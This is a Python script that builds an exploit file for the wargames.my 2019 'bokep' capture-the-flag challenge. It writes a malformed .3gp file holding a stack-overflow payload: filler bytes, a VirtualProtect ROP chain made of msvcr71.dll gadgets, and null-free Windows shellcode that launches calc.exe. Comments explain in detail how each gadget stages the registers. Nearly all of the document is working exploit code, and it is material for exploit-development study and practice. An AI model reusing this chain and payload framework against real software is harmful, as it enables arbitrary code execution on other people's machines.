Build the exploit file for the wargames.my 2019 "bokep" challenge (challenge/notes from nafiez)
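import struct

# Exploit builder for the wargames.my 2019 "bokep" challenge.  The output is
# a single malformed .3gp file whose contents are a stack-overflow payload:
# a fixed-length filler, a ROP chain that makes the stack executable with
# VirtualProtect(), and a small Windows shellcode that launches calc.exe.
#
# Practitioner caveats:
#   * Every gadget below is an absolute address inside msvcr71.dll
#     v7.10.3052.4 (the Corelan ROPdb chain, generated with mona.py).  The
#     chain is only valid while exactly that build of the DLL is mapped at
#     the base these addresses assume; any other build, or a rebased load,
#     turns the chain into a crash rather than code execution.
#   * The filler length is target-specific.  It is kept as a parameter of
#     build_exploit() so it can be retuned without touching the chain.
#   * Neither the chain nor the shellcode contains a 0x00 byte (the shellcode
#     is published as null-free).  If the target's parser turns out to choke
#     on other byte values, the chain has to be regenerated with those
#     excluded; nothing in this file checks for that.

# Bytes needed to reach the overwritten control-flow slot (presumably the
# saved return address, since the chain is placed directly after the
# filler).  NOTE(review): the value was evidently measured against the
# target in a debugger; it is not derivable from this file.
DEFAULT_OFFSET = 132

# VirtualProtect() ROP chain for msvcr71.dll v7.10.3052.4.
# url: https://www.corelan.be/index.php/security/corelan-ropdb/#msvcr71dll_v71030524
#
# How the registers are staged before PUSHAD (follow the gadget comments):
#   EAX  0xfffffdff -> NEG -> 0x201, later reloaded with the IAT pointer
#   EBX  0xffffffff -> INC -> 0 -> ADD EBX,EAX -> 0x201  (dwSize)
#   EDX  0xffffffc0 -> NEG -> 0x40                       (PAGE_EXECUTE_READWRITE)
#   ECX  writable slot in msvcr71.dll                     (lpflOldProtect)
#   ESI  JMP [EAX]     EDI  RETN (ROP nop)     EBP  "skip 4 bytes" gadget
# PUSHAD then lays these out as a VirtualProtect(lpAddress=ESP, dwSize,
# flNewProtect, lpflOldProtect) frame with EBP as the return address, and
# JMP [EAX] (EAX fixed up by ADD AL,0xEF) makes the call.  On return the
# "skip 4 bytes" gadget steps over the pushed EAX and lands on the final
# 'push esp # ret' gadget, which transfers control to the shellcode that
# immediately follows the chain in the file.
#
# NOTE(review): the original notes described this as VirtualProtectEx with
# hProcess = 0xffffffff.  That does not match the gadgets: only four
# arguments are pushed (the VirtualProtect prototype), and 0xffffffff is
# the EBX seed that becomes dwSize, not a process handle.
ROP_CHAIN = [
    0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
    0xfffffdff,  # -> EAX: value to negate, becomes 0x00000201 (dwSize)
    0x7c347f98,  # -> EDI: RETN (ROP NOP) [msvcr71.dll]
    0x7c3415a2,  # -> ESI: JMP [EAX] [msvcr71.dll]
    0xffffffff,  # -> EBX: seed, becomes 0 after INC, then 0x201 after ADD EBX,EAX
    0x7c376402,  # -> EBP: skip 4 bytes [msvcr71.dll] (return address of the call)
    0x7c351e05,  # NEG EAX # RETN [msvcr71.dll]                       EAX = 0x201
    0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]              EBX = 0
    0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN         EBX = 0x201, EAX = 1
    0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
    0xffffffc0,  # -> EDX: value to negate, becomes 0x00000040
    0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]                       EDX = 0x40
    0x7c34d201,  # POP ECX # RETN [msvcr71.dll]
    0x7c38b001,  # -> ECX: &writable location [msvcr71.dll] (lpflOldProtect)
    0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
    0x7c37a151,  # -> EAX: ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
    0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
    0x7c345c30,  # ptr to 'push esp # ret ' [msvcr71.dll] -> jumps to the shellcode
    # rop chain generated with mona.py
]

# Stack layout observed by the original author (debugger session; these
# absolute stack addresses are only illustrative and will differ elsewhere):
#   start of ROP chain          0x0018FF44
#   last gadget / lpAddress     0x0018FF88   (0x44 = 17 dwords after the start)
#   shellcode entry after ROP   0x0018FF8C
# With dwSize = 0x201 the RWX window starts at lpAddress and comfortably
# covers the shellcode placed right after the chain.

# Windows calc.exe shellcode (null-free, CreateProcessA-based).
# url: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
# Benign PoC payload: the only effect on a successfully exploited target is a
# calculator window.
SHELLCODE = (
    b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20"
    b"\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2"
    b"\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65"
    b"\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
    b"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff"
    b"\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53"
    b"\x52\x53\xff\xd7"
)


def build_exploit(offset: int = DEFAULT_OFFSET) -> bytes:
    """Return the complete payload: filler, little-endian ROP chain, shellcode.

    Args:
        offset: number of filler bytes placed before the ROP chain
            (distance to the overwritten control-flow slot).

    Returns:
        The bytes to write into the .3gp file.

    Raises:
        ValueError: if ``offset`` is negative.
    """
    if offset < 0:
        raise ValueError("offset must be non-negative")
    filler = b"A" * offset
    # One pack call instead of a per-gadget loop; "<I" keeps the 32-bit
    # little-endian layout the x86 target expects.
    chain = struct.pack("<%dI" % len(ROP_CHAIN), *ROP_CHAIN)
    return b"".join((filler, chain, SHELLCODE))


def main(path: str = "exploit.3gp") -> None:
    """Write the payload to *path* (the script's only side effect)."""
    with open(path, "wb") as fo:
        fo.write(build_exploit())


if __name__ == "__main__":
    main()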